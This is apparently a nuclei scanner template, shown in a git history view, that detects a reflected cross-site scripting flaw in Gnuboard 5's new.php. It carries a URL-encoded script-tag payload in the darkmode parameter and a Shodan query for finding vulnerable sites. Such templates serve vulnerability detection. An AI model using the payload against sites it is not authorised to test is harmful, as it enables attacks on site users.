nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml

41 lines
995 B
YAML
Raw Normal View History

2022-08-23 18:51:46 +00:00
id: gnuboard5-xss
info:
name: Gnuboard 5 - Cross-Site Scripting
2022-08-23 18:51:46 +00:00
author: arafatansari
severity: medium
description: |
Gnuboard 5 contains a cross-site scripting vulnerability via the clean_xss_tags() function called in new.php.
2022-08-23 18:51:46 +00:00
reference:
- https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
2022-08-23 18:51:46 +00:00
metadata:
2022-08-24 06:53:48 +00:00
verified: true
2022-08-23 18:51:46 +00:00
shodan-query: http.html:"gnuboard5"
tags: xss,gnuboard,gnuboard5,huntr
2022-08-23 18:51:46 +00:00
requests:
2022-08-24 06:53:48 +00:00
- method: GET
path:
- "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
2022-08-23 18:51:46 +00:00
matchers-condition: and
matchers:
2022-08-24 06:53:48 +00:00
- type: word
words:
- 'header\"><script>alert(document.domain)</script>.css?'
2022-08-23 18:51:46 +00:00
- type: word
2022-08-24 06:53:48 +00:00
part: header
2022-08-23 18:51:46 +00:00
words:
2022-08-24 06:53:48 +00:00
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/09/19